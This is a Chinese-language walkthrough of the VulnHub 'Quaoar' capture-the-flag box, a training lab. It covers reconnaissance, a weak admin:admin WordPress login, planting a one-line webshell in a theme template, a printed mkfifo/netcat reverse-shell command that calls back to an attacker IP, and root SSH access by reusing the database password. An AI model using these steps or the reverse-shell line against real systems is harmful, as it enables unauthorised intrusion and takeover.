'VulnHub Quaoar Walkthrough'

1. Goal

1
2
3
4
5
6
7
难度:非常简单
提示使用工具:
namp、dirbuster、nikto、wpscan、hydra
有3个flag
1.获得Shell
2.获得root权限
3.在box里有一个后渗透的flag

2. Web

Nmap

robots.txt

查看robots.txt

robots.txt里有wordpress的目录

访问/wordpress

管理员登录页面<http://192.168.126.162/wordpress/wp-login.php>

弱口令admin:admin登录

修改WordPress模板插入一句话

使用菜刀连WebShell

3. 渗透

反弹Shell

服务端

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.126 8126 >/tmp/f

攻击端

1
nc -lp 8126

查找敏感信息

查看目录信息

查看wordpress配置信息

获得数据库用户名和密码

1
2
user:root
password:rootpassword!

查看端口开放情况

数据库是mysql数据库

反弹的Shell无法登录mysql,输入密码之后,就卡住不动了

尝试用数据库密码ssh连接靶机

在root目录下,获得第一个flag

查找flag

wpadmin用户目录下获得第二个flag.txt

在登录界面提示上有一个后渗透的flag,还有一个flag

登录mysql,查看mysql.user

这篇WalkThrough CTF WALKTHROUGH – HACKFEST2016: QUAOAR (VULNHUB),找到了第三个flag,在/etc/cron.d/php5文件里

4. 总结

1.查看robots.txt
2.多收集工具,这个靶场可以用WPForce直接上传WebShell
3.密码习惯,很多人都会使用同一个密码,这个靶场Linux的root密码和数据库的root密码是一样的
4.熟悉各个CMS后台写入webshell的方法
5.使用菜刀的虚拟终端用python或php反弹shell有时会失败
6.cron是Linux的计划任务

5. 参考

[1] CTF WALKTHROUGH – HACKFEST2016: QUAOAR (VULNHUB)